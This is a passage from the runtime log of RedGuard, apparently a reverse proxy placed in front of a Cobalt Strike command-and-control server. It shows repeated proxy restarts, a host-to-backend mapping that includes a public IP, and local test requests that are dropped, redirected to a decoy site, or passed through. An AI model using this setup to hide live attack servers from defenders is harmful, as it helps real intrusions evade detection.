16:38:48] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 16:38:58] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:38:58] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:38:58] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:38:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:38:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:38:59] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:39:04] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:39:04] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:39:04] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:39:52] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 16:39:52] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 16:39:52] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 16:39:52] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 16:40:01] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:40:01] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:40:01] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-30 16:40:53] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 16:40:53] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 16:40:53] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 16:40:53] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 16:41:05] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:41:05] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:41:05] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-30 16:47:03] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 16:47:03] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 16:47:03] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 16:47:03] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 16:47:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:47:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:47:13] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:47:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:47:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:47:14] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:47:26] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 16:47:26] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 16:47:26] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 16:47:26] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 16:47:32] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:47:32] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:47:32] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:47:34] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:47:34] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:47:34] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:50:09] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 16:50:09] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 16:50:09] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 16:50:09] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 16:50:29] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:50:29] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:50:29] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:50:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:50:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:50:31] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:52:41] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 16:52:41] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 16:52:41] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 16:52:41] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 16:52:47] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:52:47] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:52:47] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:52:48] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:52:48] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:52:48] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:53:14] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 16:53:14] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 16:53:14] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 16:53:14] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 16:53:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:53:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:53:19] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:53:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:53:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:53:20] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 16:53:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 16:53:25] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 16:53:25] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:08:31] [RedGuard/lib.InitConfig] Fail to read file: open : The system cannot find the file specified. +[2022-05-30 17:10:48] [RedGuard/lib.InitConfig] Fail to read file: open : The system cannot find the file specified. +[2022-05-30 17:10:48] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:10:48] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:10:48] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:10:48] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:12:55] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:12:55] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:12:55] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:12:55] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:13:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:13:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 17:13:19] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:13:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:13:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 17:13:20] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:15:58] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:15:58] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:15:58] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:15:58] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:16:02] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:16:02] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 17:16:02] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:16:03] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:16:03] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 17:16:03] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:16:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:16:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 17:16:08] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:16:25] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:16:25] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:16:25] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:16:25] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:16:33] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:16:33] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 17:16:33] [RedGuard/core.(*baseHandle).ServeHTTP] 0 +[2022-05-30 17:16:33] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:16:34] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:16:34] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 17:16:34] [RedGuard/core.(*baseHandle).ServeHTTP] 169 +[2022-05-30 17:16:34] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:16:39] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:16:39] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 +[2022-05-30 17:16:39] [RedGuard/core.(*baseHandle).ServeHTTP] 169 +[2022-05-30 17:16:39] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:23:58] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:23:58] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:23:58] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:23:58] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:24:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-30 17:24:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:24:13] [RedGuard/core.(*baseHandle).ServeHTTP] [RESPONSE %!s(int64=0)] +[2022-05-30 17:24:29] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:24:29] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:24:29] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:24:29] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:24:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-30 17:24:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:24:31] [RedGuard/core.(*baseHandle).ServeHTTP] [RESPONSE 0] +[2022-05-30 17:24:50] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:24:50] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:24:50] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:24:50] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:24:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-30 17:24:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:24:52] [RedGuard/core.(*baseHandle).ServeHTTP] [RESPONSE 0] +[2022-05-30 17:28:18] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:28:18] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:28:18] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:28:18] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:28:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-30 17:28:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:28:20] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length 271 +[2022-05-30 17:28:43] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:28:43] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:28:43] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:28:43] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:28:44] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-30 17:28:44] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:28:44] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length 271 +[2022-05-30 17:29:11] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:29:11] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:29:11] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:29:11] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:29:23] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-30 17:29:23] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:29:23] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:29:23] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-05-30 17:32:28] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:32:28] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:32:28] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:32:28] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:32:29] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-30 17:32:29] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:32:30] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-05-30 17:32:30] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:32:30] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-30 17:32:59] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:32:59] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:32:59] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:32:59] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:33:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-30 17:33:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:33:00] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-05-30 17:33:00] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 +[2022-05-30 17:33:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-30 17:33:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:33:14] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-05-30 17:33:14] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-30 17:33:18] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:33:18] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:33:18] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:33:18] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:33:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-30 17:33:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:33:19] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 +[2022-05-30 17:33:20] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-30 17:34:42] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:34:42] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:34:42] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:34:42] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:34:48] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js +[2022-05-30 17:34:48] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:34:48] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 271 +[2022-05-30 17:34:48] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-30 17:34:57] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:34:57] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:34:57] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:34:57] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:35:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / +[2022-05-30 17:35:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +[2022-05-30 17:35:00] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 +[2022-05-30 17:35:00] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net +[2022-05-30 17:41:36] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... +[2022-05-30 17:41:36] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} +[2022-05-30 17:41:36] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) +[2022-05-30 17:41:36] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) +[2022-05-30 17:41:37] [RedGuard/core.(*baseHandle).ServeHTTP] [JA3] Hash: 